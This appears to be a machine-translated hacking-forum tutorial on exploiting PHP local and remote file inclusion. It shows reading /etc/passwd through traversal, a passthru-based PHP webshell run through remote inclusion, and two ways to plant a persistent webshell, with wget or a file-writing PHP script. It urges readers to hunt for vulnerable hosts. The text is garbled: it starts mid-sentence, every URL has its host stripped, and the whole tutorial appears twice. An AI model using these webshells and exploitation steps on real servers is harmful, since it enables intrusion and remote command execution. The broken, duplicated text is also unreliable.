If empty, execute else and include this file.
3. Why do loopholes occur?
You may want to say that this is great. You can dynamically include files according to the URL. How convenient is it? How can you create a vulnerability? The answer to the question is: we are not well-behaved. We always like to be different from others. We don’t follow their links. We may want to write files that we want to include (calls). For example, we will randomly type in the following URL: http:///php/?page=. Then our program will follow the steps we said above: take page as, and then go to include(). At this time, the problem arises. Because we do not have this file, it will be warned when it includes, similar to the following information:
Quote:
Warning: include() []: failed to open stream: No such file or directory in /vhost/php/ on line 3
Warning: include() []: Failed opening '' for inclusion (include_path='.:') in /vhost/php/ on line 3
Note that the Warning above cannot find the file we specified, that is, the file that cannot contain the path we specified; the warning afterwards is because the specified file was not found before, so a warning is issued when included.
4. How to use it
As you can see above, the problem has arisen. So how do we exploit such vulnerabilities? There are actually many ways to exploit them, but they are all the same in essence. I will talk about three more common methods of exploitation here:
1. Includes reading out other files on the target machine
As we can see from the previous example, since the obtained parameter page is not filtered, we can arbitrarily specify other sensitive files on the target host. For example, in the previous warning, we can see the exposed absolute path (vhost/php/), so we can detect and include other files multiple times, such as specifying the URL: http:///php/?page=./ You can read the files under the current path, or use ../ for directory jumps (without filtering ../); you can also directly specify the absolute path to read sensitive system files, such as this URL: http:///php/?page=/etc/passwd . If the target host does not have strict permission restrictions, or the permission to start Apache is relatively high, you can read the contents of this file. Otherwise you will get a Warning similar to: open_basedir restriction in effect.
2. Contains runnable PHP *s
If the target host's "allow_url_fopen" is activated (the default is activated, few people will modify it), we can have more room for utilization. We can specify a webshell containing PHP code on other URLs to run it directly. For example, I will first write a piece of PHP code to run the command (with comments, you should understand it), save it as follows (the suffix is not important, as long as the content is in PHP format).
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
if (get_magic_quotes_gpc())
{$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //Remove escape characters (the backslash characters in the string can be removed)
ini_set("max_execution_time",0); //Set the execution time for this file, 0 is not limited.
echo "
";//Print return start line prompt information
passthru($_REQUEST["cmd"]); //Run the command specified by cmd
echo "
";//Print return end line prompt information
?>
The function of the above file is to accept the command specified by cmd, and call the passthru function to execute, returning the content between. Save this file to the server of our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP, for example, the address is as follows: http://// , and then we can construct the following URL on the vulnerable host to exploit: http:////php/?page=https:///?cmd=ls , where cmd is the command you need to execute, and other commonly used commands (taking *UNIX as an example) are as follows:
Quote:
ll column directories and files (equivalent to dir under Windows)
pwd view the current absolute path
id whoami View current user
wget Download the file with the specified URL
Wait for other things, you can search for the host at BAIDU, and I won’t list it.
The above method is to get a Webshell (although this PHP file is not on the target machine, it is indeed a Webshell, isn't it? Haha)
3. Contains a PHP file that creates the file
Perhaps some people think it is more reassuring to get a real Webshell on the target machine. If one day people find that this contains vulnerability is fixed, we can no longer remotely include the "pseudo" Webshell above, right? I can understand this mentality and we continue. To get a real Webshell, we also talk about two common methods:
1) Use commands like wget to download a Webshell
This is relatively simple and is also very commonly used. In the pseudo webshell we obtained above, we can execute commands, and we can also call a very powerful character in the system, wget. You can google the power of this command, and it will definitely make you confused. Haha, we don’t need to be that complicated, so we just use -O (--output-document=FILE, write the document into the FILE file) and it’s fine, haha.
The premise is that you follow the previous steps to place a Webshell containing PHP code in a place that can be accessed through HTTP or FTP, such as: http:///, the content of the Webshell is written in this file. Then we execute the following URL in the pseudo Webshell we obtained earlier: https:///php/?page=https:///?cmd=wget https:/// -O . If the current directory is writable, we can get a Webshell. If the current directory is not writable, we need to think of other methods.
2) Use files to create
The previous wget may encounter the situation where the current directory cannot be written; or the target host has disabled (or not installed) this command, and we need to make some changes again. We can combine the previous file containing vulnerability to include a PHP script to create a file (write a file). The content is as follows:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
$f=file_get_contents("https:///"); //Open the file stream of the specified path
$ff=fopen("./upload/","a"); //Look for a directory that can be used and create a file
fwrite ($ff,$f); //Write the previously opened file stream to the created file
fclose($ff); //Close save the file
?>
It is still written to the php file we downloaded with wget above, but we have improved the method and implemented it with PHP scripts. You can use the above ?cmd=ll to find a directory that can be written, such as the upload here, and then create the file in this directory: ./upload/. Then we got our Webshell.
5. Later stories
In fact, we can end this topic here. Finally, let’s talk about a few words. The vulnerabilities in the file are basically simple but have a high crisis coefficient. They still exist in many systems. As long as you are careful, you can find many of them. The process of using is relatively flexible. You must be good at analyzing problems and finding solutions to them, and you can make progress slowly.
There is a lot of knowledge involved in the vulnerability and cannot be involved one by one. If you don’t mention the clearance, please ask questions or go to Google to solve it yourself. Time is in a hurry, and I hope everyone will correct the inappropriate description!
Finally, such things need to be practiced more. When I have time, I will find a specific example to go through this process so that everyone can have a deep understanding. You can also look for it now and find out what loopholes you find. I hope to share your more detailed analysis and utilization process with you here! 1st wish you progress
3. Why do loopholes occur?
You may want to say that this is great. You can dynamically include files according to the URL. How convenient is it? How can you create a vulnerability? The answer to the question is: we are not well-behaved. We always like to be different from others. We don’t follow their links. We may want to write files that we want to include (calls). For example, we will randomly type in the following URL: http:///php/?page=. Then our program will follow the steps we said above: take page as, and then go to include(). At this time, the problem arises. Because we do not have this file, it will be warned when it includes, similar to the following information:
Quote:
Warning: include() []: failed to open stream: No such file or directory in /vhost/php/ on line 3
Warning: include() []: Failed opening '' for inclusion (include_path='.:') in /vhost/php/ on line 3
Note that the Warning above cannot find the file we specified, that is, the file that cannot contain the path we specified; the warning afterwards is because the specified file was not found before, so a warning is issued when included.
4. How to use it
As you can see above, the problem has arisen. So how do we exploit such vulnerabilities? There are actually many ways to exploit them, but they are all the same in essence. I will talk about three more common methods of exploitation here:
1. Includes reading out other files on the target machine
As we can see from the previous example, since the obtained parameter page is not filtered, we can arbitrarily specify other sensitive files on the target host. For example, in the previous warning, we can see the exposed absolute path (vhost/php/), so we can detect and include other files multiple times, such as specifying the URL: http:///php/?page=./ You can read the files under the current path, or use ../ for directory jumps (without filtering ../); you can also directly specify the absolute path to read sensitive system files, such as this URL: http:///php/?page=/etc/passwd . If the target host does not have strict permission restrictions, or the permission to start Apache is relatively high, you can read the contents of this file. Otherwise you will get a Warning similar to: open_basedir restriction in effect.
2. Contains runnable PHP *s
If the target host's "allow_url_fopen" is activated (the default is activated, few people will modify it), we can have more room for utilization. We can specify a webshell containing PHP code on other URLs to run it directly. For example, I will first write a piece of PHP code to run the command (with comments, you should understand it), save it as follows (the suffix is not important, as long as the content is in PHP format).
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
if (get_magic_quotes_gpc())
{$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //Remove escape characters (the backslash characters in the string can be removed)
ini_set("max_execution_time",0); //Set the execution time for this file, 0 is not limited.
echo "
";//Print return start line prompt information
passthru($_REQUEST["cmd"]); //Run the command specified by cmd
echo "
";//Print return end line prompt information
?>
The function of the above file is to accept the command specified by cmd, and call the passthru function to execute, returning the content between. Save this file to the server of our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP, for example, the address is as follows: http://// , and then we can construct the following URL on the vulnerable host to exploit: http:////php/?page=https:///?cmd=ls , where cmd is the command you need to execute, and other commonly used commands (taking *UNIX as an example) are as follows:
Quote:
ll column directories and files (equivalent to dir under Windows)
pwd view the current absolute path
id whoami View current user
wget Download the file with the specified URL
Wait for other things, you can search for the host at BAIDU, and I won’t list it.
The above method is to get a Webshell (although this PHP file is not on the target machine, it is indeed a Webshell, isn't it? Haha)
3. Contains a PHP file that creates the file
Perhaps some people think it is more reassuring to get a real Webshell on the target machine. If one day people find that this contains vulnerability is fixed, we can no longer remotely include the "pseudo" Webshell above, right? I can understand this mentality and we continue. To get a real Webshell, we also talk about two common methods:
1) Use commands like wget to download a Webshell
This is relatively simple and is also very commonly used. In the pseudo webshell we obtained above, we can execute commands, and we can also call a very powerful character in the system, wget. You can google the power of this command, and it will definitely make you confused. Haha, we don’t need to be that complicated, so we just use -O (--output-document=FILE, write the document into the FILE file) and it’s fine, haha.
The premise is that you follow the previous steps to place a Webshell containing PHP code in a place that can be accessed through HTTP or FTP, such as: http:///, the content of the Webshell is written in this file. Then we execute the following URL in the pseudo Webshell we obtained earlier: https:///php/?page=https:///?cmd=wget https:/// -O . If the current directory is writable, we can get a Webshell. If the current directory is not writable, we need to think of other methods.
2) Use files to create
The previous wget may encounter the situation where the current directory cannot be written; or the target host has disabled (or not installed) this command, and we need to make some changes again. We can combine the previous file containing vulnerability to include a PHP script to create a file (write a file). The content is as follows:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
$f=file_get_contents("https:///"); //Open the file stream of the specified path
$ff=fopen("./upload/","a"); //Look for a directory that can be used and create a file
fwrite ($ff,$f); //Write the previously opened file stream to the created file
fclose($ff); //Close save the file
?>
It is still written to the php file we downloaded with wget above, but we have improved the method and implemented it with PHP scripts. You can use the above ?cmd=ll to find a directory that can be written, such as the upload here, and then create the file in this directory: ./upload/. Then we got our Webshell.
5. Later stories
In fact, we can end this topic here. Finally, let’s talk about a few words. The vulnerabilities in the file are basically simple but have a high crisis coefficient. They still exist in many systems. As long as you are careful, you can find many of them. The process of using is relatively flexible. You must be good at analyzing problems and finding solutions to them, and you can make progress slowly.
There is a lot of knowledge involved in the vulnerability and cannot be involved one by one. If you don’t mention the clearance, please ask questions or go to Google to solve it yourself. Time is in a hurry, and I hope everyone will correct the inappropriate description!
Finally, such things need to be practiced more. When I have time, I will find a specific example to go through this process so that everyone can have a deep understanding. You can also look for it now and find out what loopholes you find. I hope to share your more detailed analysis and utilization process with you here! 1st wish you progress